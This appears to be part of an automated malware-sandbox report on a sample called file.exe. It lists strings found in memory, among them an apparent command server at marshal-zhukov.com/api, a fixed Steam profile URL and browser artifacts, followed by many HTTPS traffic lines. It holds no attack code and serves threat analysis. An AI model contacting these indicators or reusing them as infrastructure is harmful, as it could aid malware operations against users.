          Source: file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/Thraka
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/Youssef1313
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/adegeo
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://github.com/dotnet/try
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/gewarren
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://github.com/js-cookie/js-cookie
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/mairaw
          Source: chromecache_123.9.drString found in binary or memory: https://github.com/nschonni
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
          Source: file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
          Source: chromecache_123.9.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
          Source: file.exe, 00000003.00000003.1564208049.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/
          Source: file.exe, 00000003.00000003.1743684827.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/)
          Source: file.exe, 00000003.00000003.1564208049.0000000000846000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1743684827.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/41
          Source: file.exe, 00000003.00000003.1564208049.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/9
          Source: file.exe, 00000003.00000003.1482021284.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1481925944.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1482088148.0000000000856000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1743552148.000000000085B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1482991747.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/api
          Source: file.exe, 00000003.00000003.1482021284.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1481925944.00000000054AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/apiYB
          Source: file.exe, 00000003.00000003.1743684827.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/y
          Source: file.exe, 00000003.00000002.1834770551.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com:443/api
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
          Source: chromecache_103.9.drString found in binary or memory: https://schema.org
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524310129.000000000082B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1564208049.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
          Source: file.exe, 00000003.00000003.1485052718.0000000005725000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000003.00000003.1485052718.0000000005725000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
          Source: chromecache_103.9.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
          Source: file.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
          Source: file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
          Source: file.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524380885.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
          Source: file.exe, 00000003.00000003.1485052718.0000000005725000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
          Source: file.exe, 00000003.00000003.1485052718.0000000005725000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
          Source: file.exe, 00000003.00000003.1485052718.0000000005725000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: file.exe, 00000003.00000003.1485052718.0000000005725000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000003.00000003.1485052718.0000000005725000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
          Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
          Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
